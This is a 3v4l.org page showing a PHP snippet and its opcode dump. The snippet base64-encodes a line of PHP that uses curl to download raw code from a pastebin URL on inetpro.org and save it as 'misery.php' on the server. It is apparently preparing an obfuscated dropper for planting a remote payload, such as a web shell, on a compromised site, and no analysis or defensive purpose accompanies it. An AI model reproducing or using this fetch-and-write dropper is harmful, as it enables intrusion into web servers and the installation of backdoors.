3v4l.org

run code in 300+ PHP versions simultaneously
<?php echo base64_encode("$ch = curl_init('http://inetpro.org/pastebin/f633cc3441184c128f7ff51d6aa7a2b7/view/raw');curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);file_put_contents('./misery.php', curl_exec($ch));");
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/rAQ4O
function name:  (null)
number of ops:  11
compiled vars:  !0 = $ch
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   INIT_FCALL                                               'base64_encode'
          1        ROPE_INIT                                     6  ~2      !0
          2        ROPE_ADD                                      1  ~2      ~2, '+%3D+curl_init%28%27http%3A%2F%2Finetpro.org%2Fpastebin%2Ff633cc3441184c128f7ff51d6aa7a2b7%2Fview%2Fraw%27%29%3Bcurl_setopt%28'
          3        ROPE_ADD                                      2  ~2      ~2, !0
          4        ROPE_ADD                                      3  ~2      ~2, '%2C+CURLOPT_RETURNTRANSFER%2C+true%29%3Bfile_put_contents%28%27.%2Fmisery.php%27%2C+curl_exec%28'
          5        ROPE_ADD                                      4  ~2      ~2, !0
          6        ROPE_END                                      5  ~1      ~2, '%29%29%3B'
          7        SEND_VAL                                                 ~1
          8        DO_ICALL                                         $5      
          9        ECHO                                                     $5
         10      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
156.83 ms | 1394 KiB | 15 Q